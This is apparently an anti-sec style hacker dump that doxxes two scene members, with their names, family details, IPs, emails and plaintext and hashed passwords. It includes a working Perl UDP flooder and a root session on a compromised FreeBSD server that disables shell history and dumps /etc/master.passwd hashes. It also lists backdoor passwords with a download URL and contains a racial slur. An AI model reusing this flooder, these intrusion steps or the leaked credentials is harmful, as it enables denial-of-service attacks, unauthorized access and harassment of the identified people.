skiddie, you are NOT supposed to know how to secure your own code.. 
(4954,'RoMeO',1188441098,0,0,'',0,'',0,0,'','','','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','',0,'0001-01-01','','','','','','','',0,1,'','',0,'',0,0,0,'',1,1,0,2,'','','','',0,1,'',0,'','',0,0,'',0,'',NULL) (5033,'RoMeO',1188441098,46,0,'',1207945792,'RoMeO',2,0,'','5921174f5ef40f7765dee53b4722426b','romeo.haxxor@gmail.com','DarkMindZ',1,'1991-02-02','DarkMindZ','http://www.darkmindz.com','DarkMindZ','','','','romeo@darkmindz.com',0,1,'','I Learn The Rules To Break Them',0,'',1,0,0,'',1,1,'77.30.170.77','','',2,1,'',30843,'','',23,106496,'',0,0,130,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'0',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,2,1,2,2,1,2,1,41,267,'down') IP address: 77.30.170.77 Reverse DNS: 77.30.170.77.dynamic.saudi.net.sa. Reverse DNS authenticity: [Could be forged: hostname 77.30.170.77.dynamic.saudi.net.sa. does not exist] ASN: 25019 ASN Name: SAUDINETSTC-AS IP range connectivity: 5 Registrar (per ASN): RIPE Country (per IP registrar): SA [Saudi Arabia] Country Currency: SAR [Saudi Arabia Riyals] Country IP Range: 77.30.0.0 to 77.31.255.255 Country fraud profile: Normal City (per outside source): Riyadh, Ar Riyad Country (per outside source): SA [Saudi Arabia] Private (internal) IP? No IP address registrar: whois.arin.net Known Proxy? No Link for WHOIS: 77.30.170.77 (23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),( IP address: 89.5.78.7 Reverse DNS: dynamic.dsl.nesma.net.sa. Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist] ASN: 24731 ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. 
(NESMA)) IP range connectivity: 1 Registrar (per ASN): RIPE Country (per IP registrar): SA [Saudi Arabia] Country Currency: SAR [Saudi Arabia Riyals] Country IP Range: 89.4.0.0 to 89.5.255.255 Country fraud profile: Normal City (per outside source): Riyadh, Ar Riyad Country (per outside source): SA [Saudi Arabia] Private (internal) IP? No IP address registrar: whois.ripe.net Known Proxy? No Link for WHOIS: 89.5.78.7 ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt ----- darkmindz.com ----- ----------------- Host's addresses: ----------------- darkmindz.com. 5 IN A 69.42.209.54 ------------- Name servers: ------------- ns6.hr-development.net. 5 IN A 69.42.209.51 ns5.hr-development.net. 5 IN A 69.42.209.50 ----------- MX record: ----------- aspmx.l.google.com. 5 IN A 209.85.219.58 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for darkmindz.com on ns6.hr-development.net ... trying zonetransfer for darkmindz.com on ns5.hr-development.net ... ------------------------------ Brute forcing with dns.txt: ------------------------------ ftp.darkmindz.com. 5 IN A 69.42.209.54 mail.darkmindz.com. 5 IN A 69.42.209.54 pop.darkmindz.com. 5 IN A 69.42.209.54 smtp.darkmindz.com. 5 IN A 69.42.209.54 www.darkmindz.com. 5 IN A 69.42.209.54 ------------------------------- darkmindz.com c class netranges: ------------------------------- 69.42.209.0/24 ----- cybershade.org ----- ----------------- Host's addresses: ----------------- cybershade.org. 5 IN A 69.42.209.54 ------------- Name servers: ------------- ns6.hr-development.net. 5 IN A 69.42.209.51 ns5.hr-development.net. 5 IN A 69.42.209.50 ----------- MX record: ----------- mail.cybershade.org. 5 IN A 69.42.209.54 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for cybershade.org on ns6.hr-development.net ... trying zonetransfer for cybershade.org on ns5.hr-development.net ... 
------------------------------ Brute forcing with dns.txt: ------------------------------ ftp.cybershade.org. 5 IN A 69.42.209.54 mail.cybershade.org. 5 IN A 69.42.209.54 pop.cybershade.org. 5 IN A 69.42.209.54 smtp.cybershade.org. 5 IN A 69.42.209.54 www.cybershade.org. 5 IN A 69.42.209.54 ------------------------------- cybershade.org c class netranges: ------------------------------- 69.42.209.0/24 2) pimpinjg Real Name: Jason Country: United States State: California Address: Age: 38 Birthday: July 18, 1971 Daughter Name: Dakota Phone Number: Nickname: pimpinjg MSN: pimpinjg@hr-development.net ICQ: 574404127 Skype: pimpinjg Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255 Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net Domain Hosting: hr-development.net Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net Company: hr-development.net Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_ PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206) Plain Password(s): joeybe11, 1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1, Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227 Common Bash Commands: nano, wget :D IRC Friends: RoMeO, garrett Affiliates: thedefaced.org, darkmindz.com Operating System(s): Ubuntu 8.10, Windows Vista - pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg pimpinjg is using modes +iwrxt pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182 pimpinjg is a registered nick pimpinjg on #underground_systems #astalavista &#darkmindz pimpinjg using twofish.securitychat.org SecurityChat.org ircd pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02 
pimpinjg End of /WHOIS list. /****************************************************************************************** * pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;) * * * New Mods (added by me) -- +--------------------------------------------------------+ * added proxy shit * removed images for less crap in the logs * added cpanel finder (thx to ackit) * added rfi/lfi finder (thx to ackit) * other shit i cba putting here +--------------------------------------------------------+ * shit to remove -- +--------------------------------------------------------+ * - a bunch of stupid code things (example: echo("$msg"); (wtf... :S)) *********************************************************/ // Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore.. H4ckinab0x.com on 2008-03-12 - Domain History Registrant: project-h4x0r 430 west imperial highway 16 brea, California 92821 United States Domain Name: H4CKINAB0X.COM Created on: 11-Mar-08 Expires on: 11-Mar-09 Last Updated on: 11-Mar-08 Administrative Contact: Gleason, rex pimpinjg4@aol.com project-h4x0r 430 west imperial highway 16 brea, California 92821 United States (714) 529-4264 Fax -- Project-h4x0r.com on 2008-02-16 - Domain History Registrant: project-h4x0r 432 west imperial highway 16 brea, California 92821 United States Domain Name: PROJECT-H4X0R.COM Created on: 13-Feb-08 Expires on: 14-Feb-10 Last Updated on: 14-Feb-08 Administrative Contact: gleason, joshua pimpinjg4@aol.com project-h4x0r 432 west imperial highway 16 brea, California 92821 United States (714) 529-4234 Fax -- Teamhbx.com on 2008-09-05 - Domain History Registrant: h4ckinab0x 234 nigger street nigger, California 11111 United States Domain Name: TEAMHBX.COM Created on: 03-Sep-08 Expires on: 03-Sep-09 Last Updated on: 03-Sep-08 Administrative Contact: nigger, nigger pimpinjg4@aol.com h4ckinab0x 234 nigger street nigger, California 11111 United States 111111111 Fax -- Afraid.org Domains: 
h4ckinab0x.com (5 hosts in use) website private pimpinjg 192 days ago (01/22/2009) copyandpaste.info (7 hosts in use) website private pimpinjg 66 days ago (05/28/2009) super-syn.net (6 hosts in use) website private pimpinjg 1 day ago (08/02/2009) anti-sec.net (6 hosts in use) website private pimpinjg 2 days ago (07/05/2009) Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q= // It's amazing what u can find on the net.. pimpinjg im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator (wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0 // How's that going for you? Managed to start your "whitehat" security company? lulz pimpinjg Posted 19 October 2008 - 02:05 PM i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a couple warez sites wont release the urls cuz advertising so yeah sup :) ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html // 8 months? Is this a bad joke or a tragedy? pimpinjg is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload till i get a good backup.. ref: http://forum.configserver.com/showthread.php?p=4535 // Did your lover backdoor you? Do you drop the soap on command now? ----- copyandpaste.info ----- ----------------- Host's addresses: ----------------- copyandpaste.info. 5 IN A 76.175.20.182 ------------- Name servers: ------------- ns2.afraid.org. 5 IN A 66.252.5.14 ns4.afraid.org. 5 IN A 67.18.179.15 ns3.afraid.org. 5 IN A 72.20.15.62 ns1.afraid.org. 5 IN A 67.19.72.206 ----------- MX record: ----------- aspmx.l.google.com. 
5 IN A 209.85.219.26 --------------------- Trying Zonetransfers: --------------------- trying zonetransfer for copyandpaste.info on ns2.afraid.org ... trying zonetransfer for copyandpaste.info on ns3.afraid.org ... trying zonetransfer for copyandpaste.info on ns4.afraid.org ... trying zonetransfer for copyandpaste.info on ns1.afraid.org ... ------------------------------ Brute forcing with dns.txt: ------------------------------ ftp.copyandpaste.info. 5 IN A 67.19.72.202 irc.copyandpaste.info. 5 IN A 94.102.58.212 mail.copyandpaste.info. 5 IN A 67.19.72.202 www.copyandpaste.info. 5 IN CNAME copyandpaste.info. copyandpaste.info. 5 IN A 76.175.20.182 ------------------------------- copyandpaste.info c class netranges: ------------------------------- 67.19.72.0/24 76.175.20.0/24 94.102.58.0/24 WebHostingTalk Rumors --------------------- * 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day * 6/9/2009 7:38 am Astalavista got hacked * 5/10/2009 9:15 am Post Your Server Uptime ref: http://www.webhostingtalk.com/profile/HRDev%20Jason // HR-Development.net the Anti-DDOS Specialist ? aka anti-sec? HRDev Jason HRDev Jason is offline View Beta Profile New Member Join Date: Mar 2009 Posts: 3 hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff? ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877 // Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert? Old 06-09-2009, 08:38 AM HRDev Jason HRDev Jason is offline View Beta Profile New Member Join Date: Mar 2009 Posts: 3 looks like the same hacker group striked again? pastebin.com/m592e1f1c i wonder what his obsession is with astalavista staff? and from the looks of it he has a 0day grsecurity exploit too, its getting really bad ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267 // Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on.. 
HRDev Jason HRDev Jason is offline View Beta Profile New Member Join Date: Mar 2009 Posts: 3 This thread needs life! && bump Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD [root@mercedes ~]# uptime 07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01 [root@mercedes ~]# ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336 romeo@mercedes~$ // romeo.copyandpaste.info

                 __   .__                        
_____     ____ _/  |_ |__|  ______  ____   ____  
\__  \   /    \\   __\|  | /  ___/_/ __ \_/ ___\ 
 / __ \_|   |  \|  |  |  | \___ \ \  ___/\  \___ 
(____  /|___|  /|__|  |__|/____  > \___  >\___  >
     \/      \/ # rm -rf /     \/      \/     \/Movement
 
						~ Fuck full-disclosure
                                                ~ Fuck the security industry
						~ Keep 0days private
						~ Hack everyone you can and then hack some more
 


http://i43.tinypic.com/21317c6.png // [root@mercedes ~]# 

/* It is clear that you and RoMeO were sharing the same hr-dev server with the following domains:


*/



#!/usr/bin/perl
# udp
#flooder.pl coded by pimpinjg

print q{
====================================================                                                                             
=						   =
=                                        Coded By  =
=                                                  =
=                                       pimpinjg   =
=                                                  =
=                                team  h4ckinab0x  =
=                                                  =
=                                h4ckinab0x.com    =
=                                                  =
====================================================
};

use io::socket;

print "Host: ";
chop ($host = );
print "Port: ";
chop ($port = );

{
$sock = IO::Socket::INET->new (
                PeerAddr => $host,
                PeerPort => $port,
                Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
}
packets:
while (1) {
$size = rand() * 200 * 2000;
print ("$host:$port packet size: $size\n");
send($sock, 0, $size);
}

ref: http://www.studentshangout.com/topic/99723-udp-flodder/

// anti-ddos specialist @ hr-dev.. 


_______         _______  ________  
\   _  \ ___  __\   _  \ \_____  \ 
/  /_\  \\  \/  /  /_\  \  _(__  < 
\  \_/   \>    <\  \_/   \/       \
 \_____  /__/\_ \\_____  /______  /
       \/      \/      \/       \/ 
                                                            __             
  ______  _  ______ _____     ____   ____      ____   _____/  |_           
 /  _ \ \/ \/ /    \\__  \   / ___\_/ __ \    /    \_/ __ \   __\   ______ 
(  <_> )     /   |  \/ __ \_/ /_/  >  ___/   |   |  \  ___/|  |    /_____/ 
 \____/ \/\_/|___|  (____  /\___  / \___  > /\___|  /\___  >__|            
                  \/     \//_____/      \/  \/    \/     \/                
__________                _________              
\______   \_______  ____ /   _____/ ____   ____  
 |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 |    |     |  | \(  <_> )        \  ___/\  \___ 
 |____|     |__|   \____/_______  /\___  >\___  >
                                \/     \/     \/ 



/* 
Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
*/

This is a private computer system which is restricted to authorized individuals.
Actual or attempted unauthorized use of this computer system will result in criminal
and/or civil prosecution.  This system is owned by Vitalspeeds Corporation of Wisconsin.
To purchase an account please visit us at http://www.vitalspeeds.com.

FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007


                              Welcome
                                to
  ___ ___ __ __          __                             __
 |   |   |__|  |_.---.-.|  |.-----.-----.-----.-----.--|  |.-----.
 |   |   |  |   _|  _  ||  ||__ --|  _  |  -__|  -__|  _  ||__ --|
  \_____/|__|____|___._||__||_____|   __|_____|_____|_____||_____|
                                  |__|



 By entering or accessing this server, you hereby agree to the Acceptable
      Use Policy and any other terms and conditions listed on our website.

     Type 'vhosts' for a list of the virtual hosts that can be used on
           this system. You can view this again by typing 'motd'.

               Support can be obtained in #vitalspeeds on EFnet.

                       http://www.vitalspeeds.com/


Perm - All support requests should go through our Ticket system @
https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .

Commands: vhosts, BitchX
NOTE: Eggdrop/BNCS use ports over 35000.

April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of 
service. Check your welcome email for user info etc. 

                +----------------------------[ Owned ]----------------------------+
                |          Hack everyone you can and then hack some more          | // romeo.copyandpaste.info
                |                           Owned[DC] v2                          |
                |                   _______ . _______ . _______                   |
                |             Get in as anonymous, Leave with no trace.           |
                |                                                                 |
                +-----------------------------------------------------------------+
         [ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]

 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.33, 0.26, 0.24
yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 18:12   still logged in
yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 17:00 - 17:39  (00:38)
katsst           ttyp1    cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37  (00:30)
dark             ftp      modemcable089.1  Sun Jun 28 15:45 - 15:45  (00:00)
smash            ttyp1    89.30.147.8      Sun Jun 28 15:30 - 15:50  (00:19)
[root@velocity:~]# w
 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.43, 0.28, 0.25
USER             TTY      FROM              LOGIN@  IDLE WHAT
romeo            p0       :ttyp2:S.0       Thu11PM     - irssi -h absolute.ownage.net
yaquis           p1       ip72-223-92-235.  6:12PM     - -bash (bash)


[root@velocity:~]# export HISTSIZE=0
[root@velocity:~]# export HISTFILE=/dev/null
[root@velocity:~]# env
TERM=vt100
SHELL=/usr/local/bin/bash
HISTSIZE=1500
SSH_CLIENT=1.3.3.7 6173 22
SSH_TTY=/dev/ttyp1
USER=root
SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
PAGER=more
LSCOLORS=ExGxFxf5CxfgDxabagacad
MAIL=/var/mail/root
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
PWD=/root
EDITOR=pico
PS1=[\u@\h:\w]\$ 
SHLVL=1
HOME=/root
LOGNAME=root
SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
HISTFILE=/dev/null
_=/usr/bin/env
[root@velocity:~]# w
 7:36PM  up 513 days,  8:04, 2 users, load averages: 0.43, 0.48, 0.43
USER             TTY      FROM              LOGIN@  IDLE WHAT
romeo            p9       :ttypf:S.0       Wed06AM     1 irssi -h absolute.ownage.net
pimpinjg         pe       cpe-76-175-20-18 Mon09PM  1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
[root@velocity:/]# date
Tue Jun 23 20:30:52 CDT 2009
[root@velocity:/]# uname -a
FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007     root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL  i386

[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
hw.machine: i386
hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
hw.ncpu: 1
hw.machine_arch: i386


[root@velocity:~]# ls -la
total 72
drwxr-xr-x   6 root  wheel   512 Jun 26 02:08 ./
drwxr-xr-x  21 root  wheel   512 Nov  5  2008 ../
-rw-------   1 root  wheel  4356 Jun 11 08:02 .bash_history
-rw-r--r--   2 root  wheel   801 Jan 12  2007 .cshrc
-rw-------   1 root  wheel     5 Apr 15  2007 .history
drwx------   2 root  wheel   512 Jun 11 10:25 .irssi/
-rw-r--r--   1 root  wheel   143 Jan 12  2007 .k5login
-rw-------   1 root  wheel    35 Jun 25 16:35 .lesshst
-rw-r--r--   1 root  wheel   293 Jan 12  2007 .login
-rw-------   1 root  wheel  2164 Jun 23 20:21 .lsof_velocity
-rw-r--r--   2 root  wheel   251 Jan 12  2007 .profile
drwx------   2 root  wheel   512 Apr 13  2007 .ssh/
drwxr-xr-x   2 root  wheel   512 Jun 24 18:00 kernels/
drwxr-xr-x   2 root  wheel   512 Nov  5  2008 supfiles/
-rwxr--r--   1 root  wheel   477 Nov  5  2008 update.sh*

[root@velocity:~]# lsof -i -n | grep ssh
sshd      43929      devil    3u  IPv4 0xca224000      0t0  TCP *:search (LISTEN)
sshd      43929      devil    5u  IPv6 0xca6b5cb0      0t0  TCP *:search (LISTEN)
sshd      43929      devil    7u  IPv4 0xca0653a0      0t0  TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
sshd      43929      devil   87u  IPv4 0xcafd2570      0t0  TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
sshd      43929      devil  154u  IPv4 0xc98913a0      0t0  TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
sshd      43929      devil  167u  IPv4 0xcc5a73a0      0t0  TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
sshd      43929      devil  192u  IPv4 0xcb023910      0t0  TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
sshd      60220       root    3u  IPv4 0xc92c9000      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
sshd      60382       root    3u  IPv4 0xc50a51d0      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
sshd      64492       root    3u  IPv6 0xcc1883a0      0t0  TCP *:ssh (LISTEN)
sshd      64492       root    4u  IPv4 0xc970d3a0      0t0  TCP *:ssh (LISTEN)
sshd      74777       root    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd      74779     ioplex    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
sshd      74779     ioplex    7u  IPv4 0xc9f58cb0      0t0  TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex    8u  IPv4 0xc91ff1d0      0t0  TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex    9u  IPv4 0xc6230910      0t0  TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   10u  IPv4 0xc9a37ae0      0t0  TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   12u  IPv4 0xc9a93740      0t0  TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   13u  IPv4 0xc97d21d0      0t0  TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   14u  IPv4 0xc5c30000      0t0  TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   15u  IPv4 0xca1cf1d0      0t0  TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   16u  IPv4 0xcc1731d0      0t0  TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
sshd      74779     ioplex   17u  IPv4 0xcc592cb0      0t0  TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
[root@velocity:~]# 

[root@velocity:/var/run]# cat /etc/passwd 
romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash 	// Luv birdz
pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash	      xxx

[root@velocity:/var/run]# cat /etc/master.passwd 
[root@velocity:/var/run]# 

[root@velocity:/]# cat /etc/master.passwd | grep romeo
romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash


[root@velocity:/]# lsof -i -n | grep romeo
irssi     32525      romeo    3u  IPv4 0xcc67d000      0t0  TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
irssi     32525      romeo    4u  IPv4 0xc9254740      0t0  TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
irssi     32525      romeo    5u  IPv4 0xc9c76cb0      0t0  TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
irssi     32525      romeo   20u  IPv4 0xc5bf1ae0      0t0  TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
sshd      83595      romeo    3u  IPv4 0xc58a23a0      0t0  TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
[root@velocity:/]# lsof -i -n | grep pimpinjg
sshd      82325   pimpinjg    3u  IPv4 0xc5480000      0t0  TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)


[root@velocity:~]# last
romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00) // RoMeO covering his tracks, once again.. lulz


[root@velocity:~]# ps -aux | grep romeo
root       83591  0.0  0.2  5400  2068  ??  Is    9:16AM   0:00.38 sshd: romeo [priv] (sshd)
romeo      83595  0.0  0.2  5384  2120  ??  S     9:16AM   0:04.62 sshd:  (sshd)
root       32336  0.0  0.1  1592   892  p2  S+    7:39PM   0:00.00 grep romeo
romeo      20712  0.0  0.1  3272  1248  p9  Is   Wed06AM   0:00.13 /usr/local/bin/bash
romeo      66004  0.0  0.7 10124  6844  p9  S+   Sat10AM   2:07.98 irssi -h absolute.ownage.net
romeo      24414  0.0  0.1  2040  1444  pf  S+    4:23PM   0:00.04 screen -r
romeo      83597  0.0  0.2  3240  1868  pf  Is    9:16AM   0:00.04 -bash (bash)
[root@velocity:~]# 

[root@velocity:~]# ps -aux | grep pimpinjg
root       82323  0.0  0.2  5400  2120  ??  Is    8:47AM   0:00.07 sshd: pimpinjg [priv] (sshd)
pimpinjg   82325  0.0  0.2  5384  2128  ??  I     8:47AM   0:00.35 sshd: pimpinjg@ttypd (sshd)
root       32340  0.0  0.1  1548   880  p2  R+    7:39PM   0:00.00 grep pimpinjg
pimpinjg   29257  0.0  0.1  2040  1444  pd  S+    6:20PM   0:00.03 screen -r
pimpinjg   82327  0.0  0.2  3232  1844  pd  Is    8:47AM   0:00.03 -bash (bash)
pimpinjg   20846  0.0  0.2  3268  1856  pe  Is    9:24PM   0:00.05 /usr/local/bin/bash
pimpinjg   82595  0.0  0.7 10476  7720  pe  S+    8:52AM   0:16.87 irssi -h 72.20.28.206


[root@velocity:/home]# ls -la
drwxr-xr-x    5 cappy57      cappy57       512 Jul 13  2007 cappy57/
drwxr-xr-x    4 cassand      cassand       512 Mar 19 14:35 cassand/
drwxr-xr-x    5 cazz1961     cazz1961      512 Apr 14 17:23 cazz1961/
drwxr-xr-x    6 ceejay       ceejay        512 Nov 23  2007 ceejay/
drwxr-xr-x    8 chaos1       chaos1       1024 Feb  6 15:26 chaos1/
drwxr-xr-x    6 1251         1251          512 Mar  9  2007 chatnet/
drwxr-xr-x    6 comedy       comedy        512 Jan 20  2007 cheazey/
drwxr-xr-x    5 chevym4n     chevym4n      512 Nov 23  2008 chevym4n/
drwxr-xr-x    3 chozen1      chozen1       512 Jan 26 19:31 chozen1/
drwxr-xr-x    5 chrirc       chrirc        512 Jun 12  2008 chrirc/
drwxr-xr-x    2 chrisdad     chrisdad      512 Dec 18  2008 chrisdad/
drwxr-xr-x    2 chriys       chriys        512 Dec  3  2008 chriys/
drwxr-xr-x    7 1085         1085          512 Feb 11  2007 cloudy1/
drwxr-xr-x    7 cmm          cmm          1024 May  9 07:01 cmm/
drwxr-xr-x    2 comedy       comedy        512 May 22  2008 comedy/
drwxr-xr-x    3 cont         cont          512 Jan 11 18:13 cont/
drwxr-xr-x    2 coolcat      coolcat       512 Mar 18  2008 coolcat/
drwxr-xr-x    2 corley       corley        512 May 12  2008 corley/
drwx--x--x    9 cpu          cpu          1024 Apr 14 15:23 cpu/
drwxr-xr-x   13 crash        crash        1024 Feb 19 20:40 crash/
drwxr-xr-x    7 crazie       crazie        512 Nov 26  2007 crazie/
drwxr-xr-x    8 crazyl       crazyl       1024 Apr 13  2007 crazyl/
drwxr-xr-x   23 crrj13       crrj13       1536 Mar 23 17:27 crrj13/
drwxr-xr-x    9 1159         1159          512 Sep  5  2005 d3vil/
drwxrwxrwx    8 daali        daali         512 Mar 11  2008 daali/
drwxr-xr-x    7 dano30       dano30        512 Apr 12  2007 dano30/
drwxr-xr-x    4 darien9      darien9      1536 Oct 31  2008 darien9/
drwxr-xr-x    7 dark         dark          512 Sep  3  2007 dark/
drwxr-xr-x    6 darkevil     darkevil      512 Mar 25  2008 darkevil/
drwxr-xr-x    5 darkuno3     darkuno3      512 Mar 10 10:27 darkuno3/
drwxr-xr-x    2 dasboot      dasboot       512 Mar 13 13:55 dasboot/
drwx------   11 1093         1093          512 Feb  5  2006 dave/
drwxr-xr-x    7 dealer       dealer        512 Feb 25 01:01 dealer/
drwxr-xr-x    6 1123         1123          512 Mar  1  2007 deathbal/
drwxr-xr-x    2 delion1      delion1       512 Feb 22 16:51 delion1/
drwxr-xr-x    3 cazz1961     cazz1961      512 Mar  1  2005 denial/
drwxr-xr-x    5 devil        devil         512 May 22 10:21 devil/
drwxr-xr-x    3 sqd          sqd           512 Dec  4  2006 digital/
drwxr-xr-x    8 digitalman   digitalman    512 May 20 14:26 digitalman/
drwxr-xr-x    5 1176         1176          512 Jan 16  2007 dizzle/
drwxr-xr-x    3 djkarl       djkarl        512 Jan 10 12:23 djkarl/
drwxr-xr-x    2 djspark      djspark       512 Jun 24  2008 djspark/
drwxr-xr-x    7 chrirc       chrirc        512 Jan  6  2007 doomed/
drwxr-xr-x    8 dravas       dravas       1024 Sep 29  2007 dravas/
drwxr-xr-x    2 dv327        dv327         512 Apr  8  2007 drk9/
drwxr-xr-x    5 1259         1259          512 Apr 11  2007 dust/
drwxr-xr-x    3 dv327        dv327         512 Aug  9  2008 dv327/
drwxr-xr-x    8 edgein       edgein        512 Feb 13  2008 edgein/
drwxr-xr-x    8 en0prcv      en0prcv       512 Apr 14  2007 en0prcv/
drwxr-xr-x    4 evino        evino         512 Jan 18  2006 evino/
drwxr-xr-x    7 blkgraz      blkgraz       512 Mar  1  2005 evino2k5/
drwxr-xr-x    4 root         wheel         512 Apr 12  2007 execute/
drwxr-xr-x    3 f3d0r        f3d0r         512 Jul 31  2007 f3d0r/
drwxr-xr-x    2 feed         feed          512 Aug 21  2008 feed/
drwxr-xr-x    4 genosyde     genosyde      512 Jan 27 18:18 genosyde/
